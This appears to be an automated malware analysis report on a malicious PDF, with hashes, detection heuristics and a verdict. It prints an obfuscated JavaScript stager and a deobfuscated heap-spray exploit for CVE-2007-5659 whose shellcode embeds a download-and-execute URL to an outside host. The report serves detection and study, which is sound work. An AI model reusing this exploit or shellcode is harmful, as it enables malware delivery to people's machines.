Malicious PDF — malware analysis report

Static analysis result for SHA-256 8154fa4e48c399bc…

MALICIOUS

PDF

11.6 KB
MD5: e61bb85113c5faf59ccc02ed0c162f1c SHA-1: 36c50d3c63ba567d9cdcc2df22e89cd693a260bb SHA-256: 8154fa4e48c399bc82806adad7127b5f9767e5707ee31cc26608ba53f4eb850a
358 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 using the Collab.collectEmailInfo method. This script is designed to download and execute a second-stage payload from the URL http://gaboyaigfds.com/nte/goldmn.asp/yH0dbf0f11V0100f060006R98253d4d102Tc7aefd19203l000c. The exploit targets specific versions of Adobe Reader, indicating a targeted attack.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-36088 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36088
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gaboyaigfds.com/nte/goldmn.asp/yH0dbf0f11V0100f060006R98253d4d102Tc7aefd19203l000c Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
9fd87306e37a04c361ea1b68a1cf4474b7a018e2270929a8c382cd129d8fc406		 pdf-javascript-stream PDF /JS object 7 at offset 0x19C 566 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function dskp(s) {s = s.split('%'); r = ''; for (c in s) {if (!s[c]) continue; r += String.fromCharCode(parseInt(s[c], 16));} return r;}vd =  ''; vnt = event; r = (r = 'l'  + vd + 'a' + 'ce', 'rep' + r); if  (!vd && r) {var z; tis = vnt['tar' + vd + 'get'];var e = vd + 'v' + 'a'; e = vd + 'e' + e; e = tis[e + 'l']; var y; z = y = tis; 
	 y = 0; 	 sas = 'sync'; sas += 'An' + vd + 'notS' + 'can'; z[sas] ( ); y = z;sbj = 'su' + 'bject';var p = y['g'+'et'+'Azots'[r](/z/, 'nn')]() ;var s = p[0][sbj];var l = s[r](/[FAE]/g, 'q%p'[r](/[qp]/g, ''));s = dskp (l) ;e(s);}
annotation_subject_callee_hex_stage_000.js
8108b1abdf8e256a0227a3e7a174764514a4dcad69c6ea84098d41de9ac8cb1a		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x14A 5137 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var U18_W_3 = new Array();var k8_2EDT8se = 0;var P_0rTk0k = "";function X_3U0HiM(A_rOae, Lxv76_6WEl){var yi_1KR_c0 = Lxv76_6WEl.toString();var A0ELMy_3Kcbi5e = "";for(var y2OnxF_EX8wpF5w = 0; y2OnxF_EX8wpF5w < yi_1KR_c0.length; y2OnxF_EX8wpF5w++) {var q_V4__w1 = parseInt(yi_1KR_c0.substr(y2OnxF_EX8wpF5w, 1));if (!isNaN(q_V4__w1)) {q_V4__w1 = q_V4__w1.toString(16);if (q_V4__w1.length == 1) { q_V4__w1 = "0" + q_V4__w1; }else if (q_V4__w1.length != 2) { q_V4__w1 = "00"; }A0ELMy_3Kcbi5e = q_V4__w1 + A0ELMy_3Kcbi5e;}}while(A0ELMy_3Kcbi5e.length < 8) { A0ELMy_3Kcbi5e = "0" + A0ELMy_3Kcbi5e; }var x_o_xs__oBv = A_rOae.toString(16);if (x_o_xs__oBv.length == 1) { x_o_xs__oBv = "0" + x_o_xs__oBv; }else if (x_o_xs__oBv.length != 2) { x_o_xs__oBv = "00"; }A0ELMy_3Kcbi5e = "3" + x_o_xs__oBv + "P" + A0ELMy_3Kcbi5e;return A0ELMy_3Kcbi5e;}function B5C__x_UDX8(f_U_cFl1, Db30xF3){var jAlo___h3iaV = new Array("");var iX5_xhu = f_U_cFl1;var Kv5Q_t_2T;if ((Kv5Q_t_2T = f_U_cFl1.lastIndexOf("%u00")) != -1) {if (Kv5Q_t_2T + 6 == f_U_cFl1.length) {jAlo___h3iaV[0] = f_U_cFl1.substr(Kv5Q_t_2T + 4, 2);iX5_xhu = f_U_cFl1.substring(0, Kv5Q_t_2T);}}Kv5Q_t_2T = 1;for (y2OnxF_EX8wpF5w = 0; y2OnxF_EX8wpF5w < Db30xF3.length; y2OnxF_EX8wpF5w++) {var t6g_d0G6 = Db30xF3.charCodeAt(y2OnxF_EX8wpF5w).toString(16);if (t6g_d0G6.length == 1) { t6g_d0G6 = "0" + t6g_d0G6; }jAlo___h3iaV[Kv5Q_t_2T] = t6g_d0G6;Kv5Q_t_2T++;}y2OnxF_EX8wpF5w = jAlo___h3iaV[0].length ? 0 : 1;jAlo___h3iaV[Kv5Q_t_2T] = "00";jAlo___h3iaV[Kv5Q_t_2T + 1] = "00";Kv5Q_t_2T += 2;if ((jAlo___h3iaV.length - y2OnxF_EX8wpF5w) % 2) {jAlo___h3iaV[Kv5Q_t_2T] = "00";}while(y2OnxF_EX8wpF5w < jAlo___h3iaV.length) {iX5_xhu += "%u" + jAlo___h3iaV[y2OnxF_EX8wpF5w + 1] + jAlo___h3iaV[y2OnxF_EX8wpF5w];y2OnxF_EX8wpF5w += 2;}iX5_xhu += "%u0000";return iX5_xhu;}function T_dCb3QKv2qb(EM_04_WRXK, duA_t3){while (EM_04_WRXK.length*2<duA_t3) {EM_04_WRXK += EM_04_WRXK;}EM_04_WRXK = EM_04_WRXK.substring(0,duA_t3/2);return EM_04_WRXK;}function UCy_a8ov(Gubi5nf, se4__p, H8e2__p53){var oxx_H_G__3 = 0x0c0c0c0c;var EM_04_WRXK = unescape(se4__p);var Db30xF3 = X_3U0HiM(Gubi5nf, H8e2__p53);var W__eS_h0_cb_G_J = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var f_U_cFl1 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u36e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u056a%ue859%u00ca%u0000%uf9e2%u00e8%u0000%u5800%u6a50%u6840%u00ff%u0000%u8350%u19c0%u5550%uec8b%u5e8b%u8310%u05c3%ue3ff%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0096%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8314%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9090%u7590%uff9a%u0856%u5651%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uabc5%u595e%ue8c3%ufec5%uffff%u4e8e%uec0e%ufe98%u0e8a%ud87e%u73e2%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7175%u7976%u6800%u7474%u3a70%u2f2f%u6167%u6f62%u6179%u6769%u6466%u2e73%u6f63%u2f6d%u746e%u2f65%u6f67%u646c%u6e6d%u612e%u7073%u792f%u3048%u6264%u3066%u3166%u5631%u3130%u3030%u3066%u3036%u3030%u5236%u3839%u3532%u6433%u6434%u3031%u5432%u3763%u6561%u6466%u3931%u3032%u6c33%u3030%u6330";app.B_LO10G = unescape(B5C__x_UDX8(f_U_cFl1, Db30xF3));var b_2_je_4K1A8B8 = 0x400000;var fB6_W3JAees = W__eS_h0_cb_G_J.length * 2;var duA_t3 = b_2_je_4K1A8B8 - (fB6_W3JAees+0x38);EM_04_WRXK = T_dCb3QKv2qb(EM_04_WRXK, duA_t3);var g7ryrOFF = (oxx_H_G__3 - 0x400000)/b_2_je_4K1A8B8;for (var f8k__0Wa_2 = 0; f8k__0Wa_2 < g7ryrOFF; f8k__0Wa_2++) {U18_W_3[f8k__0Wa_2]
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.